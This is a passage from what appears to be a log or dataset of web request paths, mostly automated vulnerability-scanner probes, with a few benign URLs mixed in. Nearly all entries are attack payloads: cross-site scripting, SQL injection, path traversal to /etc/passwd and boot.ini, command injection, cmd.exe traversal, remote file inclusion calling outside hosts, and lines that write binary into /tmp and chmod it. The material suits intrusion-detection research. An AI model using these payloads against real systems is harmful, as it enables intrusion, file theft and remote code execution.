content=\"testtkio=5454\">\n/javascript/htpasswd.rss\n/q703m78q.cfm?<script>document.cookie=\"testvowq=604;\"</script>\n/zln2hm2z.x?<script>document.cookie=\"testblcp=8120;\"</script>\n/ows-bin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/3hlysl2x.jsp?<script>document.cookie=\"testgjbe=8505;\"</script>\n/scripts/callboth.php?seq=654321&out=123456&in=1331919206@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/h4bi26jd.dll?<script>document.cookie=\"testhrzx=1150;\"</script>\n/help.php?q=\"rm\\x0bq14893241&rem\\x0b\n/manager/remindpasswd\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/cgi-bin/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/top.php?stuff='&uname #\n/xbox360subscriptionplan/\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.php3\n/n1afe1y6.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/admin/top.php?admindir=/etc/passwd\\x00\n/6n7aacgg.jspa?<script>cross_site_scripting.nasl</script>\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/ghl9il?'\n/iajtej82.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.asmx\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/tzhfyzkbomspvm?&\n/scripts/axdgpyi2bn6f.html\n/igtf0zon.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/ybz5rz7a.jspa?<script>document.cookie=\"testsbvw=6289;\"</script>\n/recordings/index.php?p='nessus\n/main.php?stuff=\"&rm\\x0bq52976574&rem\\x0b\n/ddoworrl.htm?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=&scr_height=q39895688&scr_width=\n/cacti/edit.jsp?page=user&editor=../../../install\n/en-us/33y9gcqq.cfc?<script>document.cookie=\"testnvxc=4301;\"</script>\n/scripts/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/main.php?stuff=\"del q53176124&rem \n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/i2n4v4rl.cgi?<script>cross_site_scripting.nasl</script>\n/wordextractscript/\n/javascript/w3.exe\n/scripts/nph-test-cgi\n/using logon scripts figure 71102332930350/\n/en-us/9kr0ih0v.htm?<script>document.cookie=\"testzgnm=1183;\"</script>\n/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/index.php?op=default&date=200607' union select 1,72750636,1,1,1,1,1,1,1,1--&blogid=1\n/top.php?stuff=\\x0auname\\x09>q16981558\\x09#\n/recordings/shopaddtocart.asp?productid='42\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+30+00+00+70+00+00+00+00+00+00+00+00+00+00+00++>>ctdn\n/en-us/w4996nr0.jsp?<script>document.cookie=\"testttvs=7163;\"</script>\n/7uz3ok60.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/..5c.%2e/winnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe zbkhkr.exe\n/examples/jsp/sessions/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/main.php?logout=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/main.php?logout=\"ver&rem\\x0c\n/main.php?stuff=;rm q92696358 #\n/n1afe1y6.nsf?<script>cross_site_scripting.nasl</script>\n/en-us/33y9gcqq.fts?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/top.php?stuff='\\x0drm q76686472 #\n/javascript/htpasswd.htm\n/javascript/.htaccess/sfish>'>\"><sfish></sfish>\n/examples/servlets/servlet/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/examples/servlets/servlet/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/fonts.exe\n/javascript/codecs.exe\n/examples/jsp/cal/search.pl?form=../../../../../../etc/passwd\\x00\n//</p><body><script src=http://www.example.com/test?rnd=q93624116></script><p>\n/subscriptions.war\n/javascript/ads.exe\n/news.php?config[script_path]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/examples/jsp/jsp2/jspx/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/scripts/vssetcookie.exe\n/examples/jsp/jsp2/el/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/chpasswd-newusers/\n/examples/jsp/colors/demos/demo.browse.php?filename=/etc/passwd\n/scripts/www/delivery/ac.php?bannerid=-1331923190+or+1=1+--+';passthru(base64_decode($_server[http_nessus_846o0yft]));die;/*\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/fmccqnzzib;\"\n/examples/jsp/sessions/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/aj3pf49c.idc?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/esmozg5d.jsp?<script>cross_site_scripting.nasl</script>\n/my sister's hot friends - 6 vids/\n/?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/help.php?q=\"del q98145633&rem \n/top.php?stuff=\"rm q17133825 #\n/um7xpn15.cgi?<script>document.cookie=\"testotoy=6142;\"</script>\n/examples/jsp/checkbox/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/help.php?q=\"ver\\xa0>q71425977&rem\\xa0\n/fo564rei.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?frm_daynight=q35497679&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=\n/examples/servlets/servlet/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/top.php?stuff=\"&ver\\x0b>q26467745&rem\\x0b\n/fmnveedu.pl?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/en-us/account/index.php?post=../config/password\n/m2fpztty.htm?<script>cross_site_scripting.nasl</script>\n/scriptingindesign/\n/examples/jsp/cal/cvslog.cgi?file=<script>window.alert</script>\n/javascript/de.exe\n/en-us/ddoworrl.jsp?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/top.php?stuff='\\x0adel q54187211 #\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/eqskvgtjaq0+>+/dev/null+&'); function v\n/help.php?q='uname #\n/en-us/hipkz026.mscgi?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/javascript/t.exe\n//<body><script src=http://www.example.com/test?rnd=q98513167></script>\n/examples/jsp/jsp2/el/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/i686v90l.htm?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/usr/extensions/get_tree.inc.php?globals[\\\"root_path\\\"]=@rfiurl?globals[\\\"root_path\\\"]=@rfiurl?cmd\n/phpmyadmin/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/rpc/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/a0imiuf1.cgi?<script>document.cookie=\"testxqrn=4654;\"</script>\n/<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/<44298a97/\n/d'music2/\n/cgi-bin/calendar_admin.pl?config=|cat /etc/passwd|\n/recordings/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/2aibfaczmac8?\\x00\n/examples/jsp/num/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/main.php?logout='\"ls\"\n<script>document.cookie=\"testbyqe=7474;\"</script>\n/help.php?q='&del q85582565 #\n/_vti_bin/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/g3w7y7u5.jsp?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\\x00\n/33y9gcqq.do?<script>document.cookie=\"testnvxc=4301;\"</script>\n/en-us/s7qus4g3.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/getsubscriptions/\n/main.php?stuff=\"ver;>q23861899&rem;\n/scgi-bin/gwweb.exe?help=bad-request\n/examples/jsp/num/nslookup.cgi?query=localhost;id&type=any&ns=\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/2aibfaczmac8?&\n/eg2u8pbv.php?<script>cross_site_scripting.nasl</script>\n/3j8echh0.aspx?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/examples/jsp/colors/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/en-us/manager/launcher/apps/local?msgid=149680.846943106001&amp;ns=launcher&amp;redirecting=true\n/cgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/h5sc3gxy.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/source?v=../../../../../../../../../../etc/passwd\\x00\n/javascript/signout.exe\n/t7tm4m0b.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1332008327\n/scripts/cevvxrxqxc_b.html\n/index.php?chemin=../../../../../../..//etc\n/examples/jsp/colors/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/scripts/tinfo.php?id=1331904406\n/5qnlm5z2.htm?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/examples/jsp/jsp2/jspx/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/onlinesubscription/\n/examples/jsp/jsp2/el/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cgi.cgi/cgi-test.exe\n/phpmyadmin/phpmyadmin.css.php?collation_connection=utf8_general_ci&convcharset=utf-8&js_frame=right&lang=en-utf-8&nocache=3830415403&token=<!--\n/scripts/settemplate.php\n/spicross-sitescripting/\n/j4rdyhw8.dll?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/phpmyadmin/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/bt-subscriptions/\n/main.php?stuff=ver;>q53449996&rem;\n/p043snfr.x?<script>cross_site_scripting.nasl</script>\n/scripts/smbshr.pl\n/iv5vkgam.jsp?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/javascript/sched.exe\n/en-us/9kr0ih0v.jsp?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/examples/jsp/num/shopper.cgi?newpage=../../../../../../etc/passwd\n/examples/jsp/colors/mapserv.exe?map=mapserver_detect.nasl.map\n/5qnlm5z2.pl?<script>document.cookie=\"testsixi=8451;\"</script>\n/help.php?q=ver,>q67758963&rem,\n/0qhcnefz.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<20060417234557/\n/ydexw8by.kspx?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/webdav/c99.php?act=f&f=xampp_stop.exe&d=c:\\xampp&\n/scripts/app_and_readme/navigator/index.php?page=@rfiurl\n/javascript/document.err\n/main.php?stuff=\"\\x0duname >q77128449 #\n/g3w7y7u5.cfc?<script>document.cookie=\"testbfpq=3326;\"</script>\n/phpmyadmin/documentation.html?;=1\n/javascript/migration.exe\n/help.php?q=\"sleep 11 #\n/default.asp?istate=duclassmate_sql_injections.nasl'&nstate=utah\n/g3w7y7u5.jspa?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/main.php?stuff=\"\\x0dsleep 10 #\n/bxnyrhmh.html?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/activescript/\n/examples/jsp/colors/shopexd.asp?catalogid='42\n/phprocketaddin/?page=../../../../../../../../../../../../../../../winnt/system32/ipconfig.exe\n/examples/servlets/servlet/index.php?site=../../../../../../../../etc/passwd\\x00\n/transcript_day2/\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/wseyjvsrei.sh').\"]=1\n/script-06/\n/examples/jsp/jsp2/jspx/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/aspx.exe\n/scripts/data/fetch.php?page='\n/pro-script/\n/6dlc2zm9.htm?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/n9xlumt5.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/port.php?proto=tcp'\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1332008334\")</script>\n/index.php?tasks=all\"><script>alert(\"force-xss\")</script>&project=0\n/javascript/guest.exe\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1332010411\n/help.php?q='\\x0auname\\x09#\n/nuh3zirz.idc?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ping;-w;10000;-n;1;1.2.3.4&rem;\n/phpmyadmin/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/mv8wxfy9.cfc?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/modules.php?op=modload&name=webchat&file=index&roomid=<script>alert('vulnerable')</script>\n/examples/jsp/colors/styles.php?toroot=/etc/passwd\\x00\n/u95h6ymu.do?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/runscript/\n/scripts/.htaccess.old\n/dev/translations.php?only=../../../../../etc/passwd\\x00\n/examples/jsp/cal/demos/demo.browse.php?filename=/etc/passwd\n/javascript/ws_ftp.exe\n/help.php?q='\\x0asleep 9 #\n/javascript/sec.exe\n/vmi8bb12.dll?<script>document.cookie=\"testlerc=2575;\"</script>\n/cacti/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/bin/gw5/gwweb.exe?help=bad-request\n/jujgxwav.jspa?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/id;1089332511;fp;2;fpid;37/\n/transcript_michaelrosen050506/\n/qczkquis.cfc?<script>document.cookie=\"testkwlg=5591;\"</script>\n/fnwhrxyd.pl?<script>cross_site_scripting.nasl</script>\n/ygkjkngd.idc?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/7uz3ok60.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0arm\\x09q26413975\\x09#\n/7o5qp766.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/print.php?what=article&id='\n/postscript/\n/h21y8w52.htm?<script>cross_site_scripting.nasl</script>\n/606wkcop.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/oie504mr.php?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/main.php?logout=&ver\\x0c>q85741529&rem\\x0c\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini\n/examples/jsp/sessions/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/g3w7y7u5.cgi?<script>document.cookie=\"testbfpq=3326;\"</script>\n/ap58k3ci.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/print.php?what=article&id='\n/javascript/extern.exe\n/666\\x0d\\x0a\\x0d\\x0a<script>alert(42);</script>666.jsp\n/3j8echh0.fts?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/en-us/w4996nr0.html?<script>document.cookie=\"testttvs=7163;\"</script>\n/examples/jsp/sessions/protection.php?action=logout&siteurl=/etc/passwd\n/oie504mr.cfm?<script>document.cookie=\"testtpby=7052;\"</script>\n/ht8pn8uq.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1332010419,4--&blog=1\n/0w155a7c.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/shopaddtocart.asp?productid='42\n/<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/index.php?id=hw828khs0f'\n/javascript/htpasswd.so\n/scriptoleads/\n<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/main.php?stuff=ver >q67691866&rem \n/scripts/admin/admin.php?sid='\n/scripts/index.php?edit=nonexistant1496942887\n/examples/jsp/cal/index.php?show=/etc/passwd\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=byxlme9lpglkty_er\n/fa8p8lr8.x?<script>cross_site_scripting.nasl</script>\n/index.php?op=default&date=200607' union select 1,847164494,1,1,1,1,1,1,1,1--&blogid=1\n/phpmyadmin/misc/audio.php?recording=../version.inc\n/securecgi-bin/csusercgi.exe?init+0\n/javascript/conf.exe\n/t3af3tdz.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/y8pmygrp.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/viewtopic.php?t=1&highlight='.printf(md5(acunetix_wvs_security_test)).'\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010397\n/en-us/7o5qp766.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/transcript_tennant/\n/quagynka.php?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ver >q21367835&rem \n/examples/jsp/checkbox/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/psynch/nph-psa.exe?css=http://192.168.202.96:8080/4dckqcc0acprbz?\n/gvx7m5ti.do?<script>document.cookie=\"testwldz=3506;\"</script>\n/examples/jsp/colors/a1disp3.cgi?/../../../../../../etc/passwd\n/scripts/h3d1n9eaqxv3.sh\n/index.php?id=vqqq98hjfy'\n/main.php?stuff=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/inc/formmail.inc.php?script_root=http://cirt.net/rfiinc.txt?\n/7u1pb2xi.fts?<script>document.cookie=\"testlwwz=718;\"</script>\n/examples/servlets/servlet/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/cgis/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/javascript/portal.exe\n/examples/jsp/sessions/faq.php?action=&type=view&s=&id=-1' union select 0,784779737,0,0,0,0,0--\n/t3af3tdz.exe?<script>cross_site_scripting.nasl</script>\n/forum-ra.asp?n=/../../../../../../../../../../../boot.ini\n/examples/jsp/cal/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/cinderella's/\n/examples/jsp/num/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scripts/admin/login.php\n/main.php?stuff=\";rm\\x09q87779896\\x09#\n/scripts/_xuzlr7swn95.cgi\n/en-us/ddoworrl.mscgi?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/modif_infos.asp?n=/etc/passwd\\x00\n/index.php?src=1&_common=1&time=1331919011&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/i7prbs22.pl?<script>document.cookie=\"testjnre=7328;\"</script>\n/examples/jsp/jsp2/jspx/mapserv.exe?map=mapserver_detect.nasl.map\n/en-us/account/story.pl?next=../../../../../etc/passwd\\x00\n/cacti/mlog.html?screen=/etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+22+6a+ff+ff+d0+89+ec+61+52+51+68+75+70+00+00+68+74+61+72+74+68+57+53+41+53++>>esbq\n/scripts/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php&frm_user=&scr_height=q22228911&scr_width=\n/nuh3zirz.mscgi?<script>cross_site_scripting.nasl</script>\n/\"yahya zaini\"/\n/x2gyorli.asp?<script>document.cookie=\"testwhac=3130;\"</script>\n/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/2aibfaczmac8??\n/dslpwt15.mscgi?<script>document.cookie=\"testtkio=5454;\"</script>\n/cacti/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/phpmyadmin/documentation.html?phpmyadmin=;id\n/top.php?stuff=ping;-w;10000;-n;1;4.3.2.1|rem;\n/main.php?stuff=\"&del q95559964&rem \n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --\n/<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/main.php?logout='&del q25729498 #\n/cgi-915/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/0w155a7c.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/vmi8bb12.cgi?<script>document.cookie=\"testlerc=2575;\"</script>\n/javascript/htpasswd.ora\n/7o5qp766.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/cgis/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/82q7ywa8.x?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/examples/jsp/num/mlog.html?screen=/etc/passwd\n/d44uk9h2.htm?<script>document.cookie=\"testmybc=2088;\"</script>\n/examples/jsp/sessions/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/javascript/userlog.exe\n/recordings/calendar_admin.pl?config=|cat /etc/passwd|\n/cgi-bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/scripts/starnet/addons/slideshow_full.php?album_name='1295875477\n/miz4r5hz.php?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0256\\0217\\0211\\0340j\\0020pr\" >> /tmp/qcywjpzuja0;echo|awstats894551.txt\n/cgi/testcgi.exe\n/9kr0ih0v.jsp?<script>document.cookie=\"testzgnm=1183;\"</script>\n/examples/jsp/colors/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/help.php?q=&ver,>q87859616&rem,\n/toast.asp?action=posts&sub=search&fid-1&author=r0t&subject=\"><script>alert(\"410195568176\");</script><\n/javascript/toc.exe\n/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/examples/jsp/jsp2/jspx/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/scripts/index.php?src=1&_common=1&time=1331908739&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/scripts/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/3m5knyc4.php?<script>document.cookie=\"testbgqj=6434;\"</script>\n/search=<script>alert('xss')</script>\n/scripts/ggvfa_wichxq.html\n/edv3mapy.mscgi?<script>cross_site_scripting.nasl</script>\n/prescription drug program/\n/\"religion+and+spirituality\"/\n/en-us/dda2qr7j.dll?<script>cross_site_scripting.nasl</script>\n/recordings/demos/demo.browse.php?filename=/etc/passwd\n/examples/jsp/checkbox/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/hwmxmkxsji0;').\"]=1\n/examples/jsp/error/athenareg.php?pass= ;id\n/cacti/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/uvazfs7p.dll?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/rpxyx07v.php3?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/javascript/op.exe\n/examples/jsp/jsp2/jspx/man-cgi?section=0&topic=ls;id\n/examples/jsp/sessions/index.php?op=default&date=200607' union select 1,1394748835,1,1,1,1,1,1,1,1--&blogid=1\n/main.php?stuff=&ver\\x0b>q16761326&rem\\x0b\n/superscript/\n/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd\\x00\n/javascript/readme.exe\n/help.php?q=';del\\x09q85144243\\x09#\n/mv8wxfy9.jsp?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/vhzmaia2.do?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/manager/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/examples/jsp/checkbox/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/0rufe52p.aspx?<script>cross_site_scripting.nasl</script>\n/cgi-local/.passwd\n/w4996nr0.dll?<script>document.cookie=\"testttvs=7163;\"</script>\n/phpmyadmin/tombstone.cfm?profileid=<script>foo</script>\n/help.php?q=';rm q19585815 #\n/examples/jsp/sessions/lang/index.php?file=/etc/passwd\n/nuh3zirz.exe?<script>cross_site_scripting.nasl</script>\n/o1zj4u9v.php?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/vjbrrppi.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1\n/error/500error.jsp?et=1<script>alert('vulnerable')</script>;\n/main.php?logout=\";rm q17425978 #\n/examples/jsp/jsp2/elmultihtml.pl?multi=/etc/passwd\\x00html\n/bzuf9ozq.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0duname >q75815481 #\n/comments.php?scriptpath=http://192.168.202.96:8080/txenjrxf3??\n/u8yiqilu.cgi?<script>document.cookie=\"testswjp=6010;\"</script>\n/javascript/wml.exe\n/examples/jsp/jsp2/el/htsearch?exclude=`/etc/passwd`\n/examples/jsp/sessions/embed/day.php?path=/etc/passwd\\x00\n/scripts/acp/lib/inserts.sql\n/main.php?stuff=\"\\x0auname\\x09#\n/help.php?q='rm q23433168 #\n/recordings/survey.inc.php?path=/etc/passwd\\x00\n/examples/jsp/checkbox/supporter/tupdate.php?groupid=change&sg='\n/examples/jsp/error/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/chris daughtry - american idol '06/\n/l752x1ry.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/index.php?chemin=../../../../../../..//etc\n/6n7aacgg.dll?<script>cross_site_scripting.nasl</script>\n/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/examples/jsp/sessions/more.php?id=1'\n/javascript/soap.exe\n/dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/main.php?stuff=\";del q18895618 #\n/cgi-915/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/examples/jsp/cal/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/include/default_header.php?script_path=http://192.168.202.118:8080/zz5thkvtmlgl?\n/scripts/pcadmin/login.asp?idadmin='' or 1=1--\n/en-us/s7qus4g3.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+10+00+00+20+00+00+00+00+10+00+00+10+00+00+00+00+00+00+10+00+00++>>ctdn\n/examples/jsp/colors/search/show.pl?url=file:/etc/passwd\n/manager/cart32.exe\n/zroo33l4.jsp?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/en-us/7o5qp766.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/search.php?q=<script>alert('wvs-xss-magic-string-414345592517')</script>&mode=apparel\n/help.php?q=\"\\x0asleep\\x099\\x09#\n/top.php?stuff=\"|ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/lsoix5h3.idc?<img 